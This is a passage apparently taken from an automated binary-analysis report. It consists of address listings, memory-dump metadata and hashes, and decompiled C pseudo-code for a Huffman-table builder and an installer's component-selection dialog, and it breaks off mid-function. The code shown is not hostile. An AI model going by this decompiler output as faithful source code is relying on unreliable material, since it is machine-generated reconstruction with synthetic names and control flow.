                0x00406b83
                0x00406b85
                0x00406b87
                0x00406b8c
                0x00406b92
                0x00406b97
                0x00406b99
                0x00406b99
                0x00406b8e
                0x00406b8e
                0x00406b8e
                0x00406b8c
                0x00406b9b
                0x00406b9e
                0x00406ba0
                0x00406ba3
                0x00406ba3
                0x00406bd7
                0x00406bdc
                0x00406bde
                0x00406bdf
                0x00406be1
                0x00406be2
                0x00406be2
                0x00406be2
                0x00406c0a
                0x00406c0f
                0x00406c0f
                0x00000000
                0x00406c0f
                0x00406b6f
                0x00406b12
                0x00406b12
                0x00406b13
                0x00406b5d
                0x00000000
                0x00406b5d
                0x00406b15
                0x00406b16
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00406c72
                0x00406c72
                0x00406c72
                0x00406c75
                0x00000000
                0x00000000
                0x00406c52
                0x00406c52
                0x00406c56
                0x00000000
                0x00000000
                0x00406c5c
                0x00406c5c
                0x00406c5f
                0x00406c62
                0x00406c67
                0x00406c69
                0x00406c6c
                0x00406c6f
                0x00406c6f
                0x00406c6f
                0x00406c77
                0x00406c77
                0x00406c7a
                0x00406c7c
                0x00406c81
                0x00406c84
                0x00406c86
                0x00406c89
                0x00000000
                0x00000000
                0x00406c8f
                0x00406c8f
                0x00406c91
                0x00000000
                0x00000000
                0x00406c97
                0x00406c97
                0x00406c9b
                0x00000000
                0x00000000
                0x00406ca1
                0x00406ca1
                0x00406ca4
                0x00406ca6
                0x00406d44
                0x00406d44
                0x00406d47
                0x00406d49
                0x00406d49
                0x00406d4c
                0x00406d4f
                0x00406d51
                0x00406d53
                0x00406d55
                0x00406d55
                0x00406d5e
                0x00406d63
                0x00406d66
                0x00406d69
                0x00406d6c
                0x00406d6f
                0x00406d6f
                0x00406d6f
                0x00406d72
                0x00406d78
                0x00406d78
                0x00406d7e
                0x00406d7e
                0x00406d7e
                0x00000000
                0x00406d72
                0x00406cac
                0x00406cac
                0x00406cb2
                0x00406cb5
                0x00406cb7
                0x00406ce2
                0x00406ce5
                0x00406ceb
                0x00406cf0
                0x00406cf6
                0x00406cfc
                0x00406cfe
                0x00406d01
                0x00406d0a
                0x00406d10
                0x00406d10
                0x00406d03
                0x00406d05
                0x00406d07
                0x00406d07
                0x00406d12
                0x00406d18
                0x00406d1b
                0x00406d1d
                0x00406d1f
                0x00406d25
                0x00406d27
                0x00406d29
                0x00406d2c
                0x00406d35
                0x00406d35
                0x00406d37
                0x00406d2e
                0x00406d2e
                0x00406d31
                0x00406d31
                0x00406d39
                0x00406d39
                0x00406d27
                0x00406d3c
                0x00406d3e
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00406d3e
                0x00406cb9
                0x00406cb9
                0x00406cbf
                0x00406cc5
                0x00406cc7
                0x00000000
                0x00000000
                0x00406cc9
                0x00406cc9
                0x00406ccb
                0x00406ccd
                0x00406cd0
                0x00406cd7
                0x00406cd7
                0x00406cd9
                0x00406cd2
                0x00406cd2
                0x00406cd4
                0x00406cd4
                0x00406cdb
                0x00406cdd
                0x00406ce0
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00406de4
                0x00406de7
                0x00406dea
                0x00406df0
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00406fc7
                0x00406fc7
                0x00406fc7
                0x00406fca
                0x00406fcd
                0x00406fcf
                0x00406fd2
                0x00406fd8
                0x00406fdf
                0x00406fe1
                0x00000000
                0x00000000
                0x00406eb5
                0x00406eb5
                0x00406edd
                0x00406edd
                0x00406edd
                0x00406edf
                0x00000000
                0x00000000
                0x00406ebd
                0x00406ebd
                0x00406ec1
                0x00000000
                0x00000000
                0x00406ec7
                0x00406ec7
                0x00406eca
                0x00406ecd
                0x00406ed0
                0x00406ed2
                0x00406ed4
                0x00406ed7
                0x00406eda
                0x00406eda
                0x00406eda
                0x00406ee1
                0x00406ee1
                0x00406ee9
                0x00406eec
                0x00406ef2
                0x00406ef5
                0x00406ef9
                0x00406efd
                0x00406f00
                0x00406f03
                0x00406f1b
                0x00406f1b
                0x00406f1e
                0x00406f2c
                0x00406f2f
                0x00406f20
                0x00406f20
                0x00406f22
                0x00406f29
                0x00406f29
                0x00406f58
                0x00406f58
                0x00406f58
                0x00406f5b
                0x00406f5d
                0x00000000
                0x00000000
                0x00406f38
                0x00406f38
                0x00406f3c
                0x00000000
                0x00000000
                0x00406f42
                0x00406f42
                0x00406f45
                0x00406f48
                0x00406f4b
                0x00406f4d
                0x00406f4f
                0x00406f52
                0x00406f55
                0x00406f55
                0x00406f55
                0x00406f5f
                0x00406f5f
                0x00406f61
                0x00406f63
                0x00406f6e
                0x00406f71
                0x00406f74
                0x00406f76
                0x00406f78
                0x00406f7a
                0x00406f7d
                0x00406f80
                0x00406f85
                0x00406f88
                0x00406f8b
                0x00406f8e
                0x00406f95
                0x00406f98
                0x00406f9a
                0x00000000
                0x00000000
                0x00406fa0
                0x00406fa0
                0x00406fa4
                0x00406fb5
                0x00406fb5
                0x00406fb5
                0x00406fb7
                0x00406fb7
                0x00406fbb
                0x00406fbb
                0x00406fbb
                0x00406fbd
                0x00406fbe
                0x00406fc1
                0x00406fc1
                0x00406fc1
                0x00406fc4
                0x00000000
                0x00406fc4
                0x00406fa6
                0x00406fa6
                0x00406fa9
                0x00000000
                0x00000000
                0x00406faf
                0x00406faf
                0x00000000
                0x00406faf
                0x00406f05
                0x00406f05
                0x00406f07
                0x00406f09
                0x00406f0c
                0x00406f0f
                0x00406f13
                0x00406f13
                0x00406fe7
                0x00406fe7
                0x00406fea
                0x00406ff1
                0x00406ff5
                0x00406ff7
                0x00406ffa
                0x00406ffd
                0x00407002
                0x00407005
                0x00407007
                0x00407008
                0x0040700b
                0x00407016
                0x00407019
                0x00407030
                0x00407035
                0x0040703c
                0x00407041
                0x00407045
                0x00407047
                0x00407047
                0x00407047
                0x0040704a
                0x0040704c
                0x00000000
                0x00407052
                0x00407052
                0x00407056
                0x00407061
                0x00407074
                0x00407079
                0x0040707e
                0x00407080
                0x00000000
                0x00000000
                0x00407086
                0x00407086
                0x00407089
                0x0040708b
                0x00407099
                0x00407099
                0x0040709c
                0x0040709c
                0x0040709f
                0x004070a2
                0x004070a5
                0x004070a8
                0x004070ab
                0x004070ae
                0x00000000
                0x004070ae
                0x0040708d
                0x0040708d
                0x00407093
                0x00000000
                0x00000000
                0x00000000
                0x00407093
                0x00000000
                0x00000000
                0x00000000
                0x00407432
                0x00407432
                0x00407438
                0x0040743e
                0x00407443
                0x00407449
                0x0040744f
                0x00407451
                0x00407454
                0x0040745d
                0x00407463
                0x00407463
                0x00407456
                0x00407458
                0x0040745a
                0x0040745a
                0x00407465
                0x00407467
                0x0040746a
                0x004074a5
                0x004074a5
                0x00000000
                0x0040746c
                0x0040746c
                0x0040746c
                0x00407472
                0x00407475
                0x00407477
                0x004074ac
                0x004074ae
                0x00000000
                0x004074ae
                0x00000000
                0x00407477
                0x00000000
                0x00406ab6
                0x00407484
                0x00000000
                0x00407484
                0x00406e98
                0x00406e9a
                0x00000000
                0x00000000
                0x00406e9c
                0x00406e9c
                0x00406e9f
                0x00000000
                0x00406e9f
                0x00406de4
                0x00406da5
                0x00407489
                0x0040748c
                0x0040748e
                0x00407497
                0x0040749d
                0x00000000

                Memory Dump Source
                • Source File: 00000000.00000002.364195832.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.364188833.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.364207037.0000000000408000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.364217526.000000000040A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364222666.000000000040D000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364228139.0000000000411000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364237018.000000000041B000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364244028.0000000000426000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364252926.0000000000431000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364257461.0000000000440000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364262822.000000000044C000.00000002.00020000.sdmp Download File
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: fbe53aaae7eeab696340878b5eee03eb0fd33fb80e94407ce6853ed186f7d00c
                • Instruction ID: 3db1d01f4341fbbb805040525b4c18df43ce82c239752998d09602440244d977
                • Opcode Fuzzy Hash: fbe53aaae7eeab696340878b5eee03eb0fd33fb80e94407ce6853ed186f7d00c
                • Instruction Fuzzy Hash: FEE18A71A0070ADFCB24CF59D880BAABBF5FB44305F15852EE496A72D1D338AA91CF45
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E0040755C(signed char _a4, char _a5, short _a6, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int* _a24, signed int _a28, intOrPtr _a32, signed int* _a36) {
                				signed int _v8;
                				unsigned int _v12;
                				signed int _v16;
                				intOrPtr _v20;
                				signed int _v24;
                				signed int _v28;
                				intOrPtr* _v32;
                				signed int* _v36;
                				signed int _v40;
                				signed int _v44;
                				intOrPtr _v48;
                				intOrPtr _v52;
                				void _v116;
                				signed int _v176;
                				signed int _v180;
                				signed int _v240;
                				signed int _t166;
                				signed int _t168;
                				intOrPtr _t175;
                				signed int _t181;
                				void* _t182;
                				intOrPtr _t183;
                				signed int* _t184;
                				signed int _t186;
                				signed int _t187;
                				signed int* _t189;
                				signed int _t190;
                				intOrPtr* _t191;
                				intOrPtr _t192;
                				signed int _t193;
                				signed int _t195;
                				signed int _t200;
                				signed int _t205;
                				void* _t207;
                				short _t208;
                				signed char _t222;
                				signed int _t224;
                				signed int _t225;
                				signed int* _t232;
                				signed int _t233;
                				signed int _t234;
                				void* _t235;
                				signed int _t236;
                				signed int _t244;
                				signed int _t246;
                				signed int _t251;
                				signed int _t254;
                				signed int _t256;
                				signed int _t259;
                				signed int _t262;
                				void* _t263;
                				void* _t264;
                				signed int _t267;
                				intOrPtr _t269;
                				intOrPtr _t271;
                				signed int _t274;
                				intOrPtr* _t275;
                				unsigned int _t276;
                				void* _t277;
                				signed int _t278;
                				intOrPtr* _t279;
                				signed int _t281;
                				intOrPtr _t282;
                				intOrPtr _t283;
                				signed int* _t284;
                				signed int _t286;
                				signed int _t287;
                				signed int _t288;
                				signed int _t296;
                				signed int* _t297;
                				intOrPtr _t298;
                				void* _t299;
                
                				_t278 = _a8;
                				_t187 = 0x10;
                				memset( &_v116, 0, _t187 << 2);
                				_t189 = _a4;
                				_t233 = _t278;
                				do {
                					_t166 =  *_t189;
                					_t189 =  &(_t189[1]);
                					 *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) =  *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) + 1;
                					_t233 = _t233 - 1;
                				} while (_t233 != 0);
                				if(_v116 != _t278) {
                					_t279 = _a28;
                					_t267 =  *_t279;
                					_t190 = 1;
                					_a28 = _t267;
                					_t234 = 0xf;
                					while(1) {
                						_t168 = 0;
                						if( *((intOrPtr*)(_t299 + _t190 * 4 - 0x70)) != 0) {
                							break;
                						}
                						_t190 = _t190 + 1;
                						if(_t190 <= _t234) {
                							continue;
                						}
                						break;
                					}
                					_v8 = _t190;
                					if(_t267 < _t190) {
                						_a28 = _t190;
                					}
                					while( *((intOrPtr*)(_t299 + _t234 * 4 - 0x70)) == _t168) {
                						_t234 = _t234 - 1;
                						if(_t234 != 0) {
                							continue;
                						}
                						break;
                					}
                					_v28 = _t234;
                					if(_a28 > _t234) {
                						_a28 = _t234;
                					}
                					 *_t279 = _a28;
                					_t181 = 1 << _t190;
                					while(_t190 < _t234) {
                						_t182 = _t181 -  *((intOrPtr*)(_t299 + _t190 * 4 - 0x70));
                						if(_t182 < 0) {
                							L64:
                							return _t168 | 0xffffffff;
                						}
                						_t190 = _t190 + 1;
                						_t181 = _t182 + _t182;
                					}
                					_t281 = _t234 << 2;
                					_t191 = _t299 + _t281 - 0x70;
                					_t269 =  *_t191;
                					_t183 = _t181 - _t269;
                					_v52 = _t183;
                					if(_t183 < 0) {
                						goto L64;
                					}
                					_v176 = _t168;
                					 *_t191 = _t269 + _t183;
                					_t192 = 0;
                					_t235 = _t234 - 1;
                					if(_t235 == 0) {
                						L21:
                						_t184 = _a4;
                						_t271 = 0;
                						do {
                							_t193 =  *_t184;
                							_t184 =  &(_t184[1]);
                							if(_t193 != _t168) {
                								_t232 = _t299 + _t193 * 4 - 0xb0;
                								_t236 =  *_t232;
                								 *((intOrPtr*)(0x432190 + _t236 * 4)) = _t271;
                								 *_t232 = _t236 + 1;
                							}
                							_t271 = _t271 + 1;
                						} while (_t271 < _a8);
                						_v16 = _v16 | 0xffffffff;
                						_v40 = _v40 & 0x00000000;
                						_a8 =  *((intOrPtr*)(_t299 + _t281 - 0xb0));
                						_t195 = _v8;
                						_t186 =  ~_a28;
                						_v12 = _t168;
                						_v180 = _t168;
                						_v36 = 0x432190;
                						_v240 = _t168;
                						if(_t195 > _v28) {
                							L62:
                							_t168 = 0;
                							if(_v52 == 0 || _v28 == 1) {
                								return _t168;
                							} else {
                								goto L64;
                							}
                						}
                						_v44 = _t195 - 1;
                						_v32 = _t299 + _t195 * 4 - 0x70;
                						do {
                							_t282 =  *_v32;
                							if(_t282 == 0) {
                								goto L61;
                							}
                							while(1) {
                								_t283 = _t282 - 1;
                								_t200 = _a28 + _t186;
                								_v48 = _t283;
                								_v24 = _t200;
                								if(_v8 <= _t200) {
                									goto L45;
                								}
                								L31:
                								_v20 = _t283 + 1;
                								do {
                									_v16 = _v16 + 1;
                									_t296 = _v28 - _v24;
                									if(_t296 > _a28) {
                										_t296 = _a28;
                									}
                									_t222 = _v8 - _v24;
                									_t254 = 1 << _t222;
                									if(1 <= _v20) {
                										L40:
                										_t256 =  *_a36;
                										_t168 = 1 << _t222;
                										_v40 = 1;
                										_t274 = _t256 + 1;
                										if(_t274 > 0x5a0) {
                											goto L64;
                										}
                									} else {
                										_t275 = _v32;
                										_t263 = _t254 + (_t168 | 0xffffffff) - _v48;
                										if(_t222 >= _t296) {
                											goto L40;
                										}
                										while(1) {
                											_t222 = _t222 + 1;
                											if(_t222 >= _t296) {
                												goto L40;
                											}
                											_t275 = _t275 + 4;
                											_t264 = _t263 + _t263;
                											_t175 =  *_t275;
                											if(_t264 <= _t175) {
                												goto L40;
                											}
                											_t263 = _t264 - _t175;
                										}
                										goto L40;
                									}
                									_t168 = _a32 + _t256 * 4;
                									_t297 = _t299 + _v16 * 4 - 0xec;
                									 *_a36 = _t274;
                									_t259 = _v16;
                									 *_t297 = _t168;
                									if(_t259 == 0) {
                										 *_a24 = _t168;
                									} else {
                										_t276 = _v12;
                										_t298 =  *((intOrPtr*)(_t297 - 4));
                										 *(_t299 + _t259 * 4 - 0xb0) = _t276;
                										_a5 = _a28;
                										_a4 = _t222;
                										_t262 = _t276 >> _t186;
                										_a6 = (_t168 - _t298 >> 2) - _t262;
                										 *(_t298 + _t262 * 4) = _a4;
                									}
                									_t224 = _v24;
                									_t186 = _t224;
                									_t225 = _t224 + _a28;
                									_v24 = _t225;
                								} while (_v8 > _t225);
                								L45:
                								_t284 = _v36;
                								_a5 = _v8 - _t186;
                								if(_t284 < 0x432190 + _a8 * 4) {
                									_t205 =  *_t284;
                									if(_t205 >= _a12) {
                										_t207 = _t205 - _a12 + _t205 - _a12;
                										_v36 =  &(_v36[1]);
                										_a4 =  *((intOrPtr*)(_t207 + _a20)) + 0x50;
                										_t208 =  *((intOrPtr*)(_t207 + _a16));
                									} else {
                										_a4 = (_t205 & 0xffffff00 | _t205 - 0x00000100 > 0x00000000) - 0x00000001 & 0x00000060;
                										_t208 =  *_t284;
                										_v36 =  &(_t284[1]);
                									}
                									_a6 = _t208;
                								} else {
                									_a4 = 0xc0;
                								}
                								_t286 = 1 << _v8 - _t186;
                								_t244 = _v12 >> _t186;
                								while(_t244 < _v40) {
                									 *(_t168 + _t244 * 4) = _a4;
                									_t244 = _t244 + _t286;
                								}
                								_t287 = _v12;
                								_t246 = 1 << _v44;
                								while((_t287 & _t246) != 0) {
                									_t287 = _t287 ^ _t246;
                									_t246 = _t246 >> 1;
                								}
                								_t288 = _t287 ^ _t246;
                								_v20 = 1;
                								_v12 = _t288;
                								_t251 = _v16;
                								if(((1 << _t186) - 0x00000001 & _t288) ==  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0))) {
                									L60:
                									if(_v48 != 0) {
                										_t282 = _v48;
                										_t283 = _t282 - 1;
                										_t200 = _a28 + _t186;
                										_v48 = _t283;
                										_v24 = _t200;
                										if(_v8 <= _t200) {
                											goto L45;
                										}
                										goto L31;
                									}
                									break;
                								} else {
                									goto L58;
                								}
                								do {
                									L58:
                									_t186 = _t186 - _a28;
                									_t251 = _t251 - 1;
                								} while (((1 << _t186) - 0x00000001 & _v12) !=  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0)));
                								_v16 = _t251;
                								goto L60;
                							}
                							L61:
                							_v8 = _v8 + 1;
                							_v32 = _v32 + 4;
                							_v44 = _v44 + 1;
                						} while (_v8 <= _v28);
                						goto L62;
                					}
                					_t277 = 0;
                					do {
                						_t192 = _t192 +  *((intOrPtr*)(_t299 + _t277 - 0x6c));
                						_t277 = _t277 + 4;
                						_t235 = _t235 - 1;
                						 *((intOrPtr*)(_t299 + _t277 - 0xac)) = _t192;
                					} while (_t235 != 0);
                					goto L21;
                				}
                				 *_a24 =  *_a24 & 0x00000000;
                				 *_a28 =  *_a28 & 0x00000000;
                				return 0;
                			}











































































                0x00407567
                0x0040756f
                0x00407573
                0x00407575
                0x00407578
                0x0040757a
                0x0040757a
                0x0040757c
                0x00407583
                0x00407585
                0x00407585
                0x0040758b
                0x004075a0
                0x004075a8
                0x004075aa
                0x004075ac
                0x004075af
                0x004075b0
                0x004075b0
                0x004075b6
                0x00000000
                0x00000000
                0x004075b8
                0x004075bb
                0x00000000
                0x00000000
                0x00000000
                0x004075bb
                0x004075bf
                0x004075c2
                0x004075c4
                0x004075c4
                0x004075c7
                0x004075cd
                0x004075ce
                0x00000000
                0x00000000
                0x00000000
                0x004075ce
                0x004075d3
                0x004075d6
                0x004075d8
                0x004075d8
                0x004075de
                0x004075e0
                0x004075f1
                0x004075e4
                0x004075e8
                0x0040788d
                0x00000000
                0x0040788d
                0x004075ee
                0x004075ef
                0x004075ef
                0x004075f7
                0x004075fa
                0x004075fe
                0x00407600
                0x00407602
                0x00407605
                0x00000000
                0x00000000
                0x0040760d
                0x00407613
                0x00407615
                0x00407617
                0x00407618
                0x0040762d
                0x0040762d
                0x00407630
                0x00407632
                0x00407632
                0x00407634
                0x00407639
                0x0040763b
                0x00407642
                0x00407644
                0x0040764c
                0x0040764c
                0x0040764e
                0x0040764f
                0x0040765e
                0x00407662
                0x00407666
                0x00407669
                0x0040766c
                0x00407671
                0x00407674
                0x0040767a
                0x00407681
                0x00407687
                0x00407880
                0x00407880
                0x00407885
                0x00407894
                0x00000000
                0x00000000
                0x00000000
                0x00407885
                0x00407694
                0x00407697
                0x0040769a
                0x0040769d
                0x004076a1
                0x00000000
                0x00000000
                0x004076ac
                0x004076af
                0x004076b0
                0x004076b2
                0x004076b8
                0x004076bb
                0x00000000
                0x00000000
                0x004076c1
                0x004076c2
                0x004076c5
                0x004076c8
                0x004076cb
                0x004076d1
                0x004076d3
                0x004076d3
                0x004076db
                0x004076df
                0x004076e4
                0x00407709
                0x0040770f
                0x00407711
                0x00407713
                0x00407716
                0x0040771f
                0x00000000
                0x00000000
                0x004076e6
                0x004076e6
                0x004076ef
                0x004076f3
                0x00000000
                0x00000000
                0x00407704
                0x00407704
                0x00407707
                0x00000000
                0x00000000
                0x004076f7
                0x004076fa
                0x004076fc
                0x00407700
                0x00000000
                0x00000000
                0x00407702
                0x00407702
                0x00000000
                0x00407704
                0x00407728
                0x0040772e
                0x00407738
                0x0040773a
                0x0040773f
                0x00407741
                0x00407777
                0x00407743
                0x00407743
                0x00407746
                0x00407749
                0x00407753
                0x00407756
                0x0040775d
                0x00407768
                0x0040776f
                0x0040776f
                0x00407779
                0x0040777c
                0x0040777e
                0x00407784
                0x00407784
                0x0040778d
                0x00407790
                0x00407795
                0x004077a4
                0x004077ac
                0x004077b1
                0x004077d5
                0x004077dd
                0x004077e1
                0x004077e7
                0x004077b3
                0x004077c1
                0x004077c4
                0x004077ca
                0x004077ca
                0x004077eb
                0x004077a6
                0x004077a6
                0x004077a6
                0x004077fc
                0x00407800
                0x0040780c
                0x00407807
                0x0040780a
                0x0040780a
                0x00407814
                0x00407819
                0x00407821
                0x0040781d
                0x0040781f
                0x0040781f
                0x00407827
                0x00407829
                0x00407830
                0x0040783a
                0x00407844
                0x00407860
                0x00407864
                0x004076a9
                0x004076af
                0x004076b0
                0x004076b2
                0x004076b8
                0x004076bb
                0x00000000
                0x00000000
                0x00000000
                0x004076bb
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00407846
                0x00407846
                0x00407846
                0x0040784b
                0x00407854
                0x0040785d
                0x00000000
                0x0040785d
                0x0040786a
                0x0040786a
                0x0040786d
                0x00407874
                0x00407877
                0x00000000
                0x0040769a
                0x0040761a
                0x0040761c
                0x0040761c
                0x00407620
                0x00407623
                0x00407624
                0x00407624
                0x00000000
                0x0040761c
                0x00407590
                0x00407596
                0x00000000

                Memory Dump Source
                • Source File: 00000000.00000002.364195832.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.364188833.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.364207037.0000000000408000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.364217526.000000000040A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364222666.000000000040D000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364228139.0000000000411000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364237018.000000000041B000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364244028.0000000000426000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364252926.0000000000431000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364257461.0000000000440000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364262822.000000000044C000.00000002.00020000.sdmp Download File
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: ad3a06017d63110f505e6ee1591874ec5e375aadb040ddd80f083a0c788ff2d1
                • Instruction ID: 4d3fc1c80ea15bf86cc2801d6424e98614acddb7a54358772128df9d71e60e61
                • Opcode Fuzzy Hash: ad3a06017d63110f505e6ee1591874ec5e375aadb040ddd80f083a0c788ff2d1
                • Instruction Fuzzy Hash: C6C14871E042599BCF18CF68C8905EEBBB2BF88314F25866AD85677380D7347941CF95
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 96%
                			E00404F06(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
                				struct HWND__* _v8;
                				struct HWND__* _v12;
                				long _v16;
                				signed int _v20;
                				signed int _v24;
                				intOrPtr _v28;
                				signed char* _v32;
                				int _v36;
                				signed int _v44;
                				int _v48;
                				signed int* _v60;
                				signed char* _v64;
                				signed int _v68;
                				long _v72;
                				void* _v76;
                				intOrPtr _v80;
                				intOrPtr _v84;
                				void* _v88;
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				signed int _t198;
                				intOrPtr _t201;
                				long _t207;
                				signed int _t211;
                				signed int _t222;
                				void* _t225;
                				void* _t226;
                				int _t232;
                				long _t237;
                				long _t238;
                				signed int _t239;
                				signed int _t245;
                				signed int _t247;
                				signed char _t248;
                				signed char _t254;
                				void* _t258;
                				void* _t260;
                				signed char* _t278;
                				signed char _t279;
                				long _t284;
                				struct HWND__* _t291;
                				signed int* _t292;
                				int _t293;
                				long _t294;
                				signed int _t295;
                				void* _t297;
                				long _t298;
                				int _t299;
                				signed int _t300;
                				signed int _t303;
                				signed int _t311;
                				signed char* _t319;
                				int _t324;
                				void* _t326;
                
                				_t291 = _a4;
                				_v12 = GetDlgItem(_t291, 0x3f9);
                				_v8 = GetDlgItem(_t291, 0x408);
                				_t326 = SendMessageW;
                				_v24 =  *0x434f28;
                				_v28 =  *0x434f10 + 0x94;
                				if(_a8 != 0x110) {
                					L23:
                					if(_a8 != 0x405) {
                						_t301 = _a16;
                					} else {
                						_a12 = 0;
                						_t301 = 1;
                						_a8 = 0x40f;
                						_a16 = 1;
                					}
                					if(_a8 == 0x4e || _a8 == 0x413) {
                						_v16 = _t301;
                						if(_a8 == 0x413 ||  *((intOrPtr*)(_t301 + 4)) == 0x408) {
                							if(( *0x434f19 & 0x00000002) != 0) {
                								L41:
                								if(_v16 != 0) {
                									_t237 = _v16;
                									if( *((intOrPtr*)(_t237 + 8)) == 0xfffffe3d) {
                										SendMessageW(_v8, 0x419, 0,  *(_t237 + 0x5c));
                									}
                									_t238 = _v16;
                									if( *((intOrPtr*)(_t238 + 8)) == 0xfffffe39) {
                										_t301 = _v24;
                										_t239 =  *(_t238 + 0x5c);
                										if( *((intOrPtr*)(_t238 + 0xc)) != 2) {
                											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) & 0xffffffdf;
                										} else {
                											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) | 0x00000020;
                										}
                									}
                								}
                								goto L48;
                							}
                							if(_a8 == 0x413) {
                								L33:
                								_t301 = 0 | _a8 != 0x00000413;
                								_t245 = E00404E54(_v8, _a8 != 0x413);
                								_t295 = _t245;
                								if(_t295 >= 0) {
                									_t94 = _v24 + 8; // 0x8
                									_t301 = _t245 * 0x818 + _t94;
                									_t247 =  *_t301;
                									if((_t247 & 0x00000010) == 0) {
                										if((_t247 & 0x00000040) == 0) {
                											_t248 = _t247 ^ 0x00000001;
                										} else {
                											_t254 = _t247 ^ 0x00000080;
                											if(_t254 >= 0) {
                												_t248 = _t254 & 0x000000fe;
                											} else {
                												_t248 = _t254 | 0x00000001;
                											}
                										}
                										 *_t301 = _t248;
                										E0040117D(_t295);
                										_a12 = _t295 + 1;
                										_a16 =  !( *0x434f18) >> 0x00000008 & 0x00000001;
                										_a8 = 0x40f;
                									}
                								}
                								goto L41;
                							}
                							_t301 = _a16;
                							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
                								goto L41;
                							}
                							goto L33;
                						} else {
                							goto L48;
                						}
                					} else {
                						L48:
                						if(_a8 != 0x111) {
                							L56:
                							if(_a8 == 0x200) {
                								SendMessageW(_v8, 0x200, 0, 0);
                							}
                							if(_a8 == 0x40b) {
                								_t225 =  *0x42d24c;
                								if(_t225 != 0) {
                									ImageList_Destroy(_t225);
                								}
                								_t226 =  *0x42d260;
                								if(_t226 != 0) {
                									GlobalFree(_t226);
                								}
                								 *0x42d24c = 0;
                								 *0x42d260 = 0;
                								 *0x434f60 = 0;
                							}
                							if(_a8 != 0x40f) {
                								L90:
                								if(_a8 == 0x420 && ( *0x434f19 & 0x00000001) != 0) {
                									_t324 = (0 | _a16 == 0x00000020) << 3;
                									ShowWindow(_v8, _t324);
                									ShowWindow(GetDlgItem(_a4, 0x3fe), _t324);
                								}
                								goto L93;
                							} else {
                								E004011EF(_t301, 0, 0);
                								_t198 = _a12;
                								if(_t198 != 0) {
                									if(_t198 != 0xffffffff) {
                										_t198 = _t198 - 1;
                									}
                									_push(_t198);
                									_push(8);
                									E00404ED4();
                								}
                								if(_a16 == 0) {
                									L75:
                									E004011EF(_t301, 0, 0);
                									_v36 =  *0x42d260;
                									_t201 =  *0x434f28;
                									_v64 = 0xf030;
                									_v24 = 0;
                									if( *0x434f2c <= 0) {
                										L86:
                										if( *0x434fbe == 0x400) {
                											InvalidateRect(_v8, 0, 1);
                										}
                										if( *((intOrPtr*)( *0x433edc + 0x10)) != 0) {
                											E00404E0F(0x3ff, 0xfffffffb, E00404E27(5));
                										}
                										goto L90;
                									}
                									_t292 = _t201 + 8;
                									do {
                										_t207 =  *((intOrPtr*)(_v36 + _v24 * 4));
                										if(_t207 != 0) {
                											_t303 =  *_t292;
                											_v72 = _t207;
                											_v76 = 8;
                											if((_t303 & 0x00000001) != 0) {
                												_v76 = 9;
                												_v60 =  &(_t292[4]);
                												_t292[0] = _t292[0] & 0x000000fe;
                											}
                											if((_t303 & 0x00000040) == 0) {
                												_t211 = (_t303 & 0x00000001) + 1;
                												if((_t303 & 0x00000010) != 0) {
                													_t211 = _t211 + 3;
                												}
                											} else {
                												_t211 = 3;
                											}
                											_v68 = (_t211 << 0x0000000b | _t303 & 0x00000008) + (_t211 << 0x0000000b | _t303 & 0x00000008) | _t303 & 0x00000020;
                											SendMessageW(_v8, 0x1102, (_t303 >> 0x00000005 & 0x00000001) + 1, _v72);
                											SendMessageW(_v8, 0x113f, 0,  &_v76);
                										}
                										_v24 = _v24 + 1;
                										_t292 =  &(_t292[0x206]);
                									} while (_v24 <  *0x434f2c);
                									goto L86;
                								} else {
                									_t293 = E004012E2( *0x42d260);
                									E00401299(_t293);
                									_t222 = 0;
                									_t301 = 0;
                									if(_t293 <= 0) {
                										L74:
                										SendMessageW(_v12, 0x14e, _t301, 0);
                										_a16 = _t293;
                										_a8 = 0x420;
                										goto L75;
                									} else {
                										goto L71;
                									}
                									do {
                										L71:
                										if( *((intOrPtr*)(_v28 + _t222 * 4)) != 0) {
                											_t301 = _t301 + 1;
                										}
                										_t222 = _t222 + 1;
                									} while (_t222 < _t293);
                									goto L74;
                								}
                							}
                						}
                						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
